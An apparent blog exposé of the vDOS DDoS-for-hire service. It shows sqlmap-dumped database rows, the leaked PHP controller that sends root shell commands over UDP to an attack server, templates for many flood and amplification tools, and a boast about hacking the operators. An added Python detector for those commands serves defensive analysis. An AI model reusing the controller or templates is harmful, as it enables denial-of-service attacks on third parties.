PHP on api.vdos-s.com

There was a separate leak some time ago so it has been known that PoodleStresser used vDOS. This is what my sqlmap found on PoodleStresser:

Table: servers
[6 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| AllowedMethods | varchar(255) |
| Concurrents    | int(11)      |
| ID             | int(255)     |
| name           | varchar(255) |
| SendURL        | varchar(255) |
| StopURL        | varchar(255) |
+----------------+--------------+

+----+-------+-----------------------------------------------------------------------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------+-------------+------------------------------------------------+
| ID | name  | SendURL                                                                                                               | StopURL                                                                                                                           | Concurrents | AllowedMethods                                 |
+----+-------+-----------------------------------------------------------------------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------+-------------+------------------------------------------------+
| 6  | Alpha | http://api.vdos-s.com/bigpein.php?host=%5Bhost%5D&port=%5Bport%5D&time=%5Btime%5D&method=%5Bmethod%5D&serverid=0&6667 | http://api.vdos-s.com/bigpein.php?host=%5Bhost%5D&port=%5Bport%5D&time=%5Btime%5D&method=%5Bmethod%5D&serverid=0&action=stop&6667 | 999999      | dns;xsyn;ssyn;fin;rst;ack;icmp;dominate;tcpamp |
+----+-------+-----------------------------------------------------------------------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------+-------------+------------------------------------------------+

This is the bigpein.php script:

<?php
set_time_limit(0);
ignore_user_abort(true);

// Only the two front-end hosts may call this script; any other caller gets an empty response.
if($_SERVER['REMOTE_ADDR'] != "109.236.92.157" && $_SERVER['REMOTE_ADDR'] != "188.166.71.10") die();

// Parameter checks. The host regex is unanchored: it takes the first dotted quad found
// anywhere in the value and does not check octet ranges. '6667' must merely be present.
if (ctype_digit($_GET['time']) && ctype_digit($_GET['port']) && isset($_GET['6667']) && preg_match('/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/', $_GET['host'], $match) && filter_input(INPUT_GET, 'port', FILTER_VALIDATE_INT) && filter_input(INPUT_GET, 'time', FILTER_VALIDATE_INT)){
    if($_GET['action'] != "stop") $action = "start"; else $action = "stop";
    $ip     = $match[0];
    $port   = $_GET['port'];
    $time   = $_GET['time'];
    $method = $_GET['method'];
}else{
    die('nice try tho lulz');
}

// Thread count: fixed values for a few hard-coded target prefixes, otherwise scaled by duration.
function get_threads($time,$host){
    if(strpos($host,"109.163.224")!==FALSE){
        return 20;
    }elseif(strpos($host,"24.27.236")!==FALSE){
        return 8;
    }elseif($host == "195.154.109.173" || $host == '195.154.104.15'){
        return 14;
    }elseif($time < 250){
        return 7;
    }elseif($time < 500){
        return 6;
    }elseif($time < 1000){
        return 5;
    }elseif($time < 2500){
        return 4;
    }else{
        return 3;
    }
}

// Builds the shell line the attack server will run. A start is wrapped in a detached
// screen session; a stop kills by matching the full command line with pkill -f.
function get_command($host,$port,$time,$method,$action){
    $methods = array(
        'dns'      => './dns [host] [port] dns_amp.txt [threads] [time]',
        'ovh'      => './ovh [host] [port] ovhlist.txt [threads] [time]',
        'nbs'      => './NBSattack [host] [port] nbs_amp.txt [threads] [time]',
        'ssyn'     => './essyn [host] [port] 4 700000 [time]',
        'ssdp'     => './ssdp [host] [port] ssdp_amp.txt [threads] [time]',
        'ntp'      => './ntp [host] [port] ntp_amp.txt [threads] 700000 [time]',
        'home'     => './dns [host] [port] dns_amp.txt 1 [time]',
        'xsyn'     => './xsyn [host] [port] 4 700000 [time]',
        'fin'      => './stcp [host] [port] 4 700000 [time] fin',
        'rst'      => './stcp [host] [port] 4 700000 [time] rst',
        'ack'      => './stcp [host] [port] 4 700000 [time] ack',
        'ts3'      => './ts3 [host] [port] ts3_amp.txt [threads] [time]',
        'quake'    => './quake [host] [port] quake_amp.txt [threads] [time]',
        'icmp'     => './trig -I -h [host] -p [port],[port] -t [time] -l 15',
        'nflag'    => './idk -N -h [host] -p [port],[port] -t [time] -l 70',
        'dominate' => './dominate [host] [port] [threads] -1 [time]',
        'vse'      => './vse [host] [port] [threads] [time]',
        'snmp'     => './snmp [host] [port] snmp_amp.txt [threads] [time]',
        'trig'     => './trig -h [host] -U -t [time] -l 15',
        'rip'      => './rip [host] [port] rip.txt [threads] 700000 [time]',
        'tcpamp'   => './tcp [host] [port] tcp_amp.txt 5 [time]',
        'portmap'  => './portmap [host] [port] portmap.txt [threads] 700000 [time]'
    );
    if(array_key_exists($method, $methods)){
        $find    = array('[host]', '[port]', '[time]', '[threads]');
        $replace = array($host, $port, $time, get_threads($time,$host));
        $cmd = str_replace($find, $replace, $methods[$method]);
        if($action == "start"){
            $command = "screen -dm ".$cmd;
        }elseif($action == "stop"){
            $command = "pkill -f '".$cmd."'";
        }
    }
    // For an unknown method $command is never assigned, so null is returned.
    return $command;
}

// One attack server behind this front-end; serverid is used as an array index unchecked.
$servers = array('82.118.233.4');
$server_ip   = $servers[$_GET['serverid']];
$server_port = 13371;

// The finished shell command is sent as a plaintext UDP datagram, which the attack server executes.
if ($socket = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP)) {
    $command = get_command($ip,$port,$time,$method,$action);
    socket_sendto($socket, $command, strlen($command), 0, $server_ip, $server_port);
    print "sent";
} else {
    print("can't create socket");
}

?>

They actually send shell commands in UDP packets. In this case only to one attack server (the corresponding script for vdos-s.com, index.php, has 8 of them). The attack servers execute what is in the UDP packets. As root.
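As an added example (not part of the original post, and not vDOS's code), a small Python classifier that recognises the two command shapes bigpein.php emits, so a defender looking at UDP payloads headed for an attack server's port 13371 could flag them; the sample datagrams and the 192.0.2.x addresses are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Binary names taken from the get_command() templates in the leaked script.
ATTACK_TOOLS = {
    "dns", "ovh", "NBSattack", "essyn", "ssdp", "ntp", "xsyn", "stcp", "ts3",
    "quake", "trig", "idk", "dominate", "vse", "snmp", "rip", "tcp", "portmap",
}

# bigpein.php wraps a start as `screen -dm <cmd>` and a stop as `pkill -f '<cmd>'`.
START_RE = re.compile(r"^screen -dm \./(\S+)(?: (.*))?$")
STOP_RE = re.compile(r"^pkill -f '\./(\S+)(?: (.*))?'$")
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")

@dataclass
class C2Command:
    action: str  # "start" or "stop"
    tool: str    # binary name after ./ in the template
    target: str  # first IPv4 literal among the arguments ("" if none)

def parse_c2_payload(payload: bytes) -> Optional[C2Command]:
    """Classify one UDP payload; None means it does not match the leaked shape."""
    try:
        text = payload.decode("ascii").strip()
    except UnicodeDecodeError:
        return None
    for action, rx in (("start", START_RE), ("stop", STOP_RE)):
        m = rx.match(text)
        if m and m.group(1) in ATTACK_TOOLS:
            ip = IPV4_RE.search(m.group(2) or "")
            return C2Command(action, m.group(1), ip.group(0) if ip else "")
    return None

def triage(datagrams: List[bytes]) -> List[C2Command]:
    # Run the classifier over captured payloads and keep only the hits.
    return [hit for hit in map(parse_c2_payload, datagrams) if hit]

# Constructed sample datagrams; 192.0.2.x are RFC 5737 documentation addresses.
SAMPLE_DATAGRAMS = [
    b"screen -dm ./essyn 192.0.2.10 80 4 700000 300",
    b"pkill -f './stcp 192.0.2.10 80 4 700000 300 ack'",
    b"screen -dm ./trig -I -h 192.0.2.5 -p 80,80 -t 60 -l 15",
    b"screen -dm ./bash -c id",   # binary not in the template list: not flagged
    b"GET / HTTP/1.0\r\n\r\n",    # unrelated traffic
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_DATAGRAMS):
        print(f"{hit.action:5} {hit.tool:9} target={hit.target}")
```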

The most advanced cyber gurus might already get an idea of how I rooted them. Yes, it wasn’t exactly Fort Knox.

I wouldn’t advise the Israeli army to recruit these guys to an “elite intelligence unit”. But do they have a clown unit?
